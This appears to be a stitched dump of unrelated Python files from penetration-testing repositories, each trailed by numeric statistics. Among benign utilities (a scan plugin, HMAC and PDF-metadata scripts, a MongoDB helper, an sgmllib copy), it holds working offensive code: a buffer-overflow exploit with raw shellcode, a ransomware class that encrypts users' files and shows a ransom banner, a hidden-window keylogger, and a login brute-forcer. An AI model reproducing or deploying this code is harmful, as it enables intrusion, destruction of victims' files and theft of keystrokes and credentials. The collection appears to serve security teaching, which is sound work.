#This is the contents of register r9, where the shellcode is placed; it was verified with a debugger. This method is important when we don't have access to the application's source code, and it is built on the assumption that the address in register r9 will not change across consecutive runs, since address randomization is disabled. If the address changes, we should instead look for an instruction that does "jmp r9".
return_address = '\x30\xde\xff\xff\xff\x7f\x00\x00'
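# Illustrative fallback sketch ("vuln_app" is a placeholder binary name): if
# the r9 address did shift between runs, the usual trick is to return through
# a "jmp r9" instruction inside the binary itself. This helper greps objdump
# output for such gadgets; it is defined here but not called.
def find_jmp_r9_gadgets(binary="vuln_app"):
    import subprocess
    gadgets = []
    for line in subprocess.check_output(["objdump", "-d", binary]).splitlines():
        if "jmp" in line and "%r9" in line:  # AT&T syntax, e.g. "jmpq *%r9"
            gadgets.append(line.split(":")[0].strip())
    return gadgets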
## Building the nop slide
nop_slide = "\x90" * nop_length
## Malicious code injection
buf = ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xfa\x6e\x99\x49\xdc\x75\xa8"
buf += "\x43\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x90\x47\xc1\xd0\xb6\x77\xf7\x29\xfb\x30\x96\x4c\x94"
buf += "\xe2\xe0\xfa\xf8\x6e\x88\x15\xa3\x75\xa8\x42\xab\x26"
buf += "\x10\xaf\xb6\x65\xf2\x29\xd0\x36\x96\x4c\xb6\x76\xf6"
buf += "\x0b\x05\xa0\xf3\x68\x84\x7a\xad\x36\x0c\x04\xa2\x11"
buf += "\x45\x3d\x13\x6c\x98\x07\xf7\x66\xaf\x1d\xa8\x10\xb2"
buf += "\xe7\x7e\x1b\x8b\x3d\x21\xa5\xf5\x6b\x99\x49\xdc\x75"
buf += "\xa8\x43"
## Building the padding between buffer overflow start and return address
padding = 'B' * (payload_length - nop_length - len(buf))
#perfect
print nop_slide + buf + padding + return_address
| 41.121951 | 419 | 0.735805 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Arachni
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Arachni"
def run(PluginInfo):
resource = get_resources("Arachni_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 33.066667 | 98 | 0.77451 |
Effective-Python-Penetration-Testing | import hmac
import hashlib
digest_maker = hmac.new('secret-key', '', hashlib.sha256)
f = open('sample-file.txt', 'rb')
try:
while True:
block = f.read(1024)
if not block:
break
digest_maker.update(block)
finally:
f.close()
digest = digest_maker.hexdigest()
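# Illustrative verification step ('expected' is a stand-in for a MAC received
# with the file): compare MACs in constant time rather than with '==', which
# can leak timing information. hmac.compare_digest needs Python 2.7.7+.
expected = digest
if hmac.compare_digest(digest, expected):
    print 'MAC verified (constant-time comparison)'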
print digest | 17.647059 | 57 | 0.620253 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pyPdf
import optparse
from pyPdf import PdfFileReader
def printMeta(fileName):
pdfFile = PdfFileReader(file(fileName, 'rb'))
docInfo = pdfFile.getDocumentInfo()
print '[*] PDF MetaData For: ' + str(fileName)
for metaItem in docInfo:
print '[+] ' + metaItem + ':' + docInfo[metaItem]
def main():
parser = optparse.OptionParser('usage %prog "+\
"-F <PDF file name>')
parser.add_option('-F', dest='fileName', type='string',\
help='specify PDF file name')
(options, args) = parser.parse_args()
fileName = options.fileName
if fileName == None:
print parser.usage
exit(0)
else:
printMeta(fileName)
if __name__ == '__main__':
main()
| 22.363636 | 60 | 0.609091 |
Ethical-Hacking-Scripts | from cryptography.fernet import Fernet
import os, sys
class RansomWare:
def __init__(self):
self.f = b'QAYEFKLQT469LdHWIs4ZG7xKrDr8JRzMTwNFvoQFILg='
self.fernet = Fernet(self.f)
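        # Aside (illustrative): a key like the hard-coded one above comes from
        # Fernet.generate_key(), which returns 32 url-safe base64-encoded bytes:
        #   key = Fernet.generate_key()
        # Hard-coding the key, as done here, is what makes decryption possible.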
self.dirlist = []
self.file_list = []
input("[+] This Ransomware can seriously F up your computer(Encrypts personal files). ONLY PRESS ENTER IF YOU ARE OK WITH THIS HAPPENING.")
input("[+] ARE YOU SURE? THERE IS NO TURNING BACK.")
print("[+] Your loss :( .")
def get_file_name(self):
return sys.argv[0].replace('/',' ').replace("\\"," ").split()[len(sys.argv[0].replace('/',' ').replace("\\"," ").split())-1]
def get_filelist(self):
filelist = []
try:
for i in os.listdir():
if "." in i:
filelist.append(os.path.join(os.getcwd(), i))
except:
pass
return filelist
def get_dir_list(self):
dirlist = []
try:
for i in os.listdir():
if "." not in i:
dirlist.append(os.path.join(os.getcwd(), i))
except:
pass
return dirlist
def encrypt_file(self, filename):
working = False
try:
file = open(filename, "rb")
working = True
except:
pass
if working:
content = file.read()
file.close()
file = open(filename, "wb")
file.write(self.fernet.encrypt(content))
file.close()
else:
file.close()
def decrypt_file(self, filename):
working = False
try:
file = open(filename, "rb")
working = True
except:
            pass
if working:
try:
content = file.read()
file.close()
decrypt_content = self.fernet.decrypt(content)
file = open(filename, "wb")
file.write(decrypt_content)
file.close()
except:
pass
else:
file.close()
def get_files(self):
if sys.platform == "win32":
os.chdir("C:/Users/")
else:
os.chdir("/Users/")
self.dirlist.extend(self.get_dir_list())
self.file_list.extend(self.get_filelist())
for i in self.dirlist:
try:
os.chdir(i)
self.file_list.extend(self.get_filelist())
self.dirlist.extend(self.get_dir_list())
except:
pass
def encrypt_files(self):
self.get_files()
for i in self.file_list:
try:
self.encrypt_file(i)
except:
pass
self.display_warning()
self.enter_enc_key()
def decrypt_files(self):
self.get_files()
for i in self.file_list:
try:
self.decrypt_file(i)
except:
pass
def display_warning(self):
print(f"""
===============================================================================================================================
__ __ _ ____ _____ _ _ _
\ \ / / ( ) | _ \ / ____| (_) | | |
\ \_/ /__ _ _|/__ _____ | |_) | ___ ___ _ __ | | ___ _ __ ___ _ __ _ __ ___ _ __ ___ _ ___ ___ __| | |
\ / _ \| | | | \ \ / / _ \ | _ < / _ \/ _ \\ '_ \ | | / _ \| '_ ` _ \| '_ \| '__/ _ \| '_ ` _ \| / __|/ _ \/ _` | |
| | (_) | |_| | \ V / __/ | |_) | __/ __/ | | | | |___| (_) | | | | | | |_) | | | (_) | | | | | | \__ \ __/ (_| |_|
|_|\___/ \__,_| \_/ \___| |____/ \___|\___|_| |_| \_____\___/|_| |_| |_| .__/|_| \___/|_| |_| |_|_|___/\___|\__,_(_)
| |
|_|
===============================================================================================================================
[+] You are a victim of RansomSquid!
[+] All of your files have been encrypted.
[+] DO NOT CLOSE THIS WINDOW AS ALL YOUR FILES WILL BE LOST IF YOU DO SO.""")
def enter_enc_key(self):
while True:
key = input("[+] Enter the Encryption Key to Decrypt all of the encrypted Files: ").encode()
if key == self.f:
print("[+] Decrypting your files.")
self.decrypt_files()
input("[+] Press Enter to Exit.")
break
else:
print("[+] Your Key Is Invalid!")
"""
Get rid of the hashtags if you have gone insane.
"""
#e = RansomWare()
#e.encrypt_files()
| 39.078125 | 148 | 0.358354 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher S. Duffy
Date: March 2015
Name: username_generator.py
Purpose: To generate a username list from the US Census Top 1000 surnames and other lists
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from collections import namedtuple
import string
import argparse
import os
try:
import xlrd
except:
sys.exit("[!] Please install the xlrd library: pip install xlrd")
def unique_list(list_sort, verbose):
noted = []
if verbose > 0:
print("[*] Removing duplicates while maintaining order")
[noted.append(item) for item in list_sort if not noted.count(item)] # List comprehension
return noted
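# Equivalent approach (illustrative, unused below): OrderedDict.fromkeys also
# dedupes while keeping first-seen order, without the O(n^2) count() scan.
def unique_list_ordered(list_sort):
    from collections import OrderedDict
    return list(OrderedDict.fromkeys(list_sort))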
def census_parser(filename, verbose):
# Create the named tuple
CensusTuple = namedtuple('Census', 'name, rank, count, prop100k, cum_prop100k, pctwhite, pctblack, pctapi, pctaian, pct2prace, pcthispanic')
# Define the location of the file and worksheet till arguments are developed
worksheet_name = "top1000"
#Define work book and work sheet variables
workbook = xlrd.open_workbook(filename)
spreadsheet = workbook.sheet_by_name(worksheet_name)
total_rows = spreadsheet.nrows - 1
current_row = -1
# Define holder for details
username_dict = {}
surname_dict = {}
alphabet = list(string.ascii_lowercase)
while current_row < total_rows:
row = spreadsheet.row(current_row)
current_row += 1
entry = CensusTuple(*tuple(row)) #Passing the values of the row as a tuple into the namedtuple
surname_dict[entry.rank] = entry
cellname = entry.name
cellrank = entry.rank
for letter in alphabet:
if "." not in str(cellrank.value):
if verbose > 1:
print("[-] Eliminating table headers")
break
username = letter + str(cellname.value.lower())
rank = str(cellrank.value)
username_dict[username] = rank
username_list = sorted(username_dict, key=lambda key: username_dict[key])
return(surname_dict, username_dict, username_list)
def username_file_parser(prepend_file, append_file, verbose):
if prepend_file:
put_where = "begin"
filename = prepend_file
elif append_file:
put_where = "end"
filename = append_file
else:
sys.exit("[!] There was an error in processing the supplemental username list!")
with open(filename) as file:
lines = [line.rstrip('\n') for line in file]
if verbose > 1:
if "end" in put_where:
print("[*] Appending %d entries to the username list") % (len(lines))
else:
print("[*] Prepending %d entries to the username list") % (len(lines))
return(lines, put_where)
def combine_usernames(supplemental_list, put_where, username_list, verbose):
if "begin" in put_where:
username_list[:0] = supplemental_list #Prepend with a slice
if "end" in put_where:
username_list.extend(supplemental_list)
username_list = unique_list(username_list, verbose)
return(username_list)
def write_username_file(username_list, filename, domain, verbose):
open(filename, 'w').close() #Delete contents of file name
if domain:
domain_filename = filename + "_" + domain
email_list = []
open(domain_filename, 'w').close()
if verbose > 1:
print("[*] Writing to %s") % (filename)
with open(filename, 'w') as file:
file.write('\n'.join(username_list))
if domain:
if verbose > 1:
print("[*] Writing domain supported list to %s") % (domain_filename)
for line in username_list:
email_address = line + "@" + domain
email_list.append(email_address)
with open(domain_filename, 'w') as file:
file.write('\n'.join(email_list))
return
if __name__ == '__main__':
# If script is executed at the CLI
usage = '''usage: %(prog)s [-c census.xlsx] [-f output_filename] [-a append_filename] [-p prepend_filename] [-d domain_name] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-c", "--census", type=str, help="The census file that will be used to create usernames, this can be retrieved like so:\n wget http://www2.census.gov/topics/genealogy/2000surnames/Top1000.xls", action="store", dest="census_file")
parser.add_argument("-f", "--filename", type=str, help="Filename for output the usernames", action="store", dest="filename")
parser.add_argument("-a","--append", type=str, action="store", help="A username list to append to the list generated from the census", dest="append_file")
parser.add_argument("-p","--prepend", type=str, action="store", help="A username list to prepend to the list generated from the census", dest="prepend_file")
parser.add_argument("-d","--domain", type=str, action="store", help="The domain to append to usernames", dest="domain_name")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Set Constructors
census_file = args.census_file # Census
filename = args.filename # Filename for outputs
verbose = args.verbose # Verbosity level
append_file = args.append_file # Filename for the appending usernames to the output file
prepend_file = args.prepend_file # Filename to prepend to the usernames to the output file
domain_name = args.domain_name # The name of the domain to be appended to the username list
dir = os.getcwd() # Get current working directory
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if append_file and prepend_file:
sys.exit("[!] Please select either prepend or append for a file not both")
if not filename:
if os.name != "nt":
filename = dir + "/census_username_list"
else:
filename = dir + "\\census_username_list"
else:
if filename:
if "\\" or "/" in filename:
if verbose > 1:
print("[*] Using filename: %s") % (filename)
else:
if os.name != "nt":
filename = dir + "/" + filename
else:
filename = dir + "\\" + filename
if verbose > 1:
print("[*] Using filename: %s") % (filename)
# Define working variables
sur_dict = {}
user_dict = {}
user_list = []
sup_username = []
target = []
combined_users = []
# Process census file
if not census_file:
sys.exit("[!] You did not provide a census file!")
else:
sur_dict, user_dict, user_list = census_parser(census_file, verbose)
# Process supplemental username file
if append_file or prepend_file:
sup_username, target = username_file_parser(prepend_file, append_file, verbose)
combined_users = combine_usernames(sup_username, target, user_list, verbose)
else:
combined_users = user_list
write_username_file(combined_users, filename, domain_name, verbose)
| 43.00995 | 253 | 0.660373 |
PenTestScripts | #!/usr/bin/env python
import os
import win32console
import win32gui
import pythoncom
import pyHook
# This is completely based off the code at this URL (with very minor mods)
# https://github.com/blaz1988/keylogger/blob/master/keylogger.py
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
    if event.Ascii == 5:   # Ctrl-E kills the logger
        os._exit(1)
    if event.Ascii != 0 and event.Ascii != 8:   # skip NUL and backspace
        f = open('C:\\Users\\Christopher\\Downloads\\output.txt', 'r+')
        buffer = f.read()
        f.close()
        f = open('C:\\Users\\Christopher\\Downloads\\output.txt', 'w')
        keylogs = chr(event.Ascii)
        if event.Ascii == 13:   # Enter -> newline
            keylogs = '\n'
        buffer += keylogs
        f.write(buffer)
        f.close()
    return True   # pass the event on so keystrokes are not swallowed
f1 = open('C:\Users\Christopher\Downloads\output.txt', 'w')
f1.write('Incoming keys:\n')
f1.close()
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
| 25.764706 | 74 | 0.673267 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : mongo_db.py
# @Desc : ""
from flask import Flask
from pymongo import MongoClient
from instance import config
ProductionConfig = config.ProductionConfig
app = Flask(__name__)
app.config.from_object(ProductionConfig)
db_host = app.config.get('DB_HOST')
db_port = app.config.get('DB_PORT')
db_username = app.config.get('DB_USERNAME')
db_password = app.config.get('DB_PASSWORD')
db_name = app.config.get('DB_NAME')
def connectiondb(collection):
client = MongoClient(db_host, db_port)
db = client[db_name]
db.authenticate(db_username, db_password)
dbcollection = db[collection]
return dbcollection
def db_management(command):
client = MongoClient(db_host, db_port)
db = client[db_name]
db.authenticate(db_username, db_password)
if command == 'collection_names':
result = db.collection_names()
return result
def db_name_conf():
asset_db = app.config.get('ASSET_DB')
tasks_db = app.config.get('TASKS_DB')
vul_db = app.config.get('VULNERABILITY_DB')
plugin_db = app.config.get('PLUGIN_DB')
config_db = app.config.get('CONFIG_DB')
server_db = app.config.get('SERVER_DB')
subdomain_db = app.config.get('SUBDOMAIN_DB')
domain_db = app.config.get('DOMAIN_DB')
weekpasswd_db = app.config.get('WEEKPASSWD_DB')
port_db = app.config.get('PORT_DB')
auth_db = app.config.get('AUTH_DB')
search_db = app.config.get('SEARCH_DB')
acunetix_db = app.config.get('ACUNETIX_DB')
db_name_dict = {
'asset_db': asset_db,
'tasks_db': tasks_db,
'vul_db': vul_db,
'plugin_db': plugin_db,
'config_db': config_db,
'server_db': server_db,
'subdomain_db': subdomain_db,
'domain_db': domain_db,
'weekpasswd_db': weekpasswd_db,
'port_db': port_db,
'auth_db': auth_db,
'search_db': search_db,
'acunetix_db': acunetix_db,
}
return db_name_dict
if __name__ == "__main__":
print db_management('collection_names')
| 27.917808 | 51 | 0.627488 |
Python-Penetration-Testing-for-Developers | #brute force passwords
import sys
import urllib
import urllib2
if len(sys.argv) !=3:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r').readlines()
passwordlist = open(filename2,'r').readlines()
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
    user = user.strip()
    for password in passwordlist:
        data = urllib.urlencode({"username":user, "password":password.strip()})
        request = urllib2.urlopen(url,data)
        response = request.read()
        request.close()
        # the marker string means the login failed; its absence means a hit
        if response.find(UnknownStr) < 0:
            foundusers.append(user)
            break
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 21.029412 | 59 | 0.712567 |
Broken-Droid-Factory | import os
import random
import re
import randomword
class patcher():
'''
An interface to be inherited by other patchers, including shared features.
All patchers should also have a difficulty and a patch function (patch functions should return a string detailing what they did).
'''
name = None
difficulty = None
working_dir = None
is_verbose = False
def _get_path_to_file(self, file_name_to_find, dir_to_start_search=None):
if dir_to_start_search == None:
dir_to_start_search = self.working_dir
for subdir, dirs, files in os.walk(dir_to_start_search):
for file in files:
file_path = str(os.path.join(subdir, file))
if file == file_name_to_find:
return file_path
def _add_java_code_to_file(self, path_to_file, code_to_add_as_string,
line_to_add_after='''setContentView(R.layout.activity_main);'''):
lines = None
with open(path_to_file, "r") as file:
lines = file.readlines()
line_to_add_to = 0
for line in lines:
if line_to_add_after in line:
line_to_add_to = line_to_add_to + 1
break
line_to_add_to = line_to_add_to + 1
new_data_as_list = [code_to_add_as_string]
lines_to_write = lines[:line_to_add_to] + ["\n"] + new_data_as_list + ["\n"] + lines[line_to_add_to:]
with open(path_to_file, "w") as file:
file.writelines(lines_to_write)
def _add_imports_to_java_file(self, path_to_java_file, import_as_string):
lines = None
with open(path_to_java_file, "r") as file:
lines = file.readlines()
found_import = False
for line in lines:
if import_as_string in line:
found_import = True
if not found_import:
new_data_as_list = [import_as_string]
lines_to_write = [lines[0]] + ["\n"] + new_data_as_list + ["\n"] + lines[1:]
with open(path_to_java_file, "w") as file:
file.writelines(lines_to_write)
def _get_random_java_code_block(self):
var_one_identifier = "{}{}".format(str(randomword.get_random_word()).capitalize(), random.randint(0, 1000))
reflection_code_block = ['''import android.util.Log;import java.lang.reflect.Method;''',
'''Method[] methods{} = this.getClass().getDeclaredMethods();
for (Method method : methods{}) {{
Log.v("{}", method.getName());
}}'''.format(var_one_identifier, var_one_identifier, randomword.get_random_word())]
log_code_block = ['''import android.util.Log;''',
'Log.{}("{}","{}");'.format(random.choice(["d", "e", "i", "v", "wtf"]),
randomword.get_random_word(), randomword.get_random_word())]
toast_code_block = ['''import android.widget.Toast;''',
'''Toast.makeText(getApplicationContext(),"{}",Toast.{}).show();'''.format(
randomword.get_random_word(), random.choice(["LENGTH_SHORT", "LENGTH_LONG"]))]
intent_code_block = ['''import android.content.Intent;''', '''Intent launchIntent{} = getPackageManager().getLaunchIntentForPackage("com.android.chrome");
startActivity(launchIntent{});'''.format(var_one_identifier, var_one_identifier)]
code_blocks = [reflection_code_block, log_code_block, toast_code_block, intent_code_block]
return random.choice(code_blocks)
def get_all_current_components_from_activity_path(self, path_to_activity=None):
if path_to_activity == None:
path_to_activity = os.path.join(self.working_dir, "app", "src", "main", "res", "layout",
"activity_main.xml")
activiy_file = open(path_to_activity, "r")
activity_data = activiy_file.read()
activiy_file.close()
ids = re.findall(r'@\+id/(.+)', activity_data)
return ids
def logger(self, string_to_print):
if self.is_verbose:
print(string_to_print)
def _generate_activity_xml(self, activity_name="MainActivity"):
number_of_elements = random.randint(1, 10)
string_builder = '''<?xml version="1.0" encoding="utf-8"?>
<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".{}">'''.format(activity_name)
for iterator in range(0, number_of_elements):
string_builder = string_builder + "\n\n{}".format(self._generate_random_xml_activity_component())
string_builder = string_builder + "\n\n</androidx.constraintlayout.widget.ConstraintLayout>"
return string_builder
def _generate_random_xml_activity_component(self, id=None):
if id == None:
id = randomword.get_random_word() + str(random.randint(24, 400))
text_view_xml = '''<TextView
android:id="@+id/textView{}"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="{}"
android:textSize="{}sp"
app:layout_constraintBottom_toBottomOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, randomword.get_random_word(),
random.randint(24, 400))
button_view_xml = '''<Button
android:id="@+id/button{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginTop="{}dp"
android:text="{}"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintHorizontal_bias="0.542"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400),
randomword.get_random_word())
image_view_xml = '''<ImageView
android:id="@+id/imageView{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginEnd="{}dp"
android:layout_marginBottom="{}dp"
app:layout_constraintBottom_toTopOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:srcCompat="@drawable/ic_launcher_foreground" />'''.format(id, random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400))
edit_text_view_xml = '''<EditText
android:id="@+id/editTextTextPersonName{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginTop="{}dp"
android:layout_marginBottom="{}dp"
android:ems="10"
android:inputType="textPersonName"
android:text="{}"
app:layout_constraintBottom_toTopOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, random.randint(40, 400), random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400), randomword.get_random_word())
list_of_views = [text_view_xml, button_view_xml, image_view_xml, edit_text_view_xml]
return random.choice(list_of_views)
def _replace_everywhere(self, string_to_replace, new_string):
        # To minimise conflicts these are done separately
# Replace file content
for subdir, dirs, files in os.walk(self.working_dir):
for file in files:
file = str(os.path.join(subdir, file))
self._replace_in_file(file, string_to_replace, "{}".format(new_string))
# Rename files
for subdir, dirs, files in os.walk(self.working_dir):
for file in files:
file_path = str(os.path.join(subdir, file))
if string_to_replace in file:
os.rename(file_path, str(file).replace(string_to_replace, new_string))
# rename dirs
for subdir, dirs, files in os.walk(self.working_dir):
if string_to_replace in subdir:
name_to_replace = str(subdir).replace(string_to_replace, new_string)
os.rename(subdir, name_to_replace)
def _replace_in_file(self, file_path, string_to_remove, string_to_replace):
fin = open(file_path, "rt")
        try:
            data = fin.read()
        except UnicodeDecodeError:
            fin.close()   # skip binary files we cannot decode
            return
data = data.replace(string_to_remove, string_to_replace)
fin.close()
fin = open(file_path, "wt")
fin.write(data)
fin.close()
def __init__(self, name, working_dir, verbosity=False):
self.name = name
self.working_dir = working_dir
self.is_verbose = verbosity
def patch(self):
raise ("A patcher has been used that does not have an implemented patch function")
| 43.20354 | 162 | 0.553509 |
PenetrationTestingScripts | # Taken from Python 2.6.4 and regexp module constants modified
"""A parser for SGML, using the derived class as a static DTD."""
# XXX This only supports those SGML features used by HTML.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special). RCDATA is
# not supported at all.
# from warnings import warnpy3k
# warnpy3k("the sgmllib module has been removed in Python 3.0",
# stacklevel=2)
# del warnpy3k
import markupbase
import re
__all__ = ["SGMLParser", "SGMLParseError"]
# Regular expressions used for parsing
interesting = re.compile('[&<]')
incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|'
'<([a-zA-Z][^<>]*|'
'/([a-zA-Z][^<>]*)?|'
'![^<>]*)?')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
# hack to fix http://bugs.python.org/issue803422
# charref = re.compile('&#([0-9]+)[^0-9]')
charref = re.compile("&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]")
starttagopen = re.compile('<[>a-zA-Z]')
shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/')
shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/')
piclose = re.compile('>')
endbracket = re.compile('[<>]')
# hack moved from _beautifulsoup.py (bundled BeautifulSoup version 2)
#This code makes Beautiful Soup able to parse XML with namespaces
# tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*')
tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
attrfind = re.compile(
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?')
class SGMLParseError(RuntimeError):
"""Exception raised for all parse errors."""
pass
# SGML parser base class -- find tags and call handler functions.
# Usage: p = SGMLParser(); p.feed(data); ...; p.close().
# The dtd is defined by deriving a class which defines methods
# with special names to handle tags: start_foo and end_foo to handle
# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself.
# (Tags are converted to lower case for this purpose.) The data
# between tags is passed to the parser by calling self.handle_data()
# with some data as argument (the data may be split up in arbitrary
# chunks). Entity references are passed by calling
# self.handle_entityref() with the entity reference as argument.
class SGMLParser(markupbase.ParserBase):
# Definition of entities -- derived classes may override
entity_or_charref = re.compile('&(?:'
'([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)'
')(;?)')
def __init__(self, verbose=0):
"""Initialize and reset this instance."""
self.verbose = verbose
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.__starttag_text = None
self.rawdata = ''
self.stack = []
self.lasttag = '???'
self.nomoretags = 0
self.literal = 0
markupbase.ParserBase.reset(self)
def setnomoretags(self):
"""Enter literal mode (CDATA) till EOF.
Intended for derived classes only.
"""
self.nomoretags = self.literal = 1
def setliteral(self, *args):
"""Enter literal mode (CDATA).
Intended for derived classes only.
"""
self.literal = 1
def feed(self, data):
"""Feed some data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n'). (This just saves the text,
all the processing is done by goahead().)
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle the remaining data."""
self.goahead(1)
def error(self, message):
raise SGMLParseError(message)
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.nomoretags:
self.handle_data(rawdata[i:n])
i = n
break
match = interesting.search(rawdata, i)
if match: j = match.start()
else: j = n
if i < j:
self.handle_data(rawdata[i:j])
i = j
if i == n: break
if rawdata[i] == '<':
if starttagopen.match(rawdata, i):
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
k = self.parse_starttag(i)
if k < 0: break
i = k
continue
if rawdata.startswith("</", i):
k = self.parse_endtag(i)
if k < 0: break
i = k
self.literal = 0
continue
if self.literal:
if n > (i + 1):
self.handle_data("<")
i = i+1
else:
# incomplete
break
continue
if rawdata.startswith("<!--", i):
# Strictly speaking, a comment is --.*--
# within a declaration tag <!...>.
# This should be removed,
# and comments handled only in parse_declaration.
k = self.parse_comment(i)
if k < 0: break
i = k
continue
if rawdata.startswith("<?", i):
k = self.parse_pi(i)
if k < 0: break
i = i+k
continue
if rawdata.startswith("<!", i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
k = self.parse_declaration(i)
if k < 0: break
i = k
continue
elif rawdata[i] == '&':
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
match = charref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_charref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
else:
self.error('neither < nor & ??')
# We get here only if incomplete matches but
# nothing else
match = incomplete.match(rawdata, i)
if not match:
self.handle_data(rawdata[i])
i = i+1
continue
j = match.end(0)
if j == n:
break # Really incomplete
self.handle_data(rawdata[i:j])
i = j
# end while
if end and i < n:
self.handle_data(rawdata[i:n])
i = n
self.rawdata = rawdata[i:]
# XXX if end: check for empty stack
# Extensions for the DOCTYPE scanner:
_decl_otherchars = '='
# Internal -- parse processing instr, return length or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
if rawdata[i:i+2] != '<?':
self.error('unexpected call to parse_pi()')
match = piclose.search(rawdata, i+2)
if not match:
return -1
j = match.start(0)
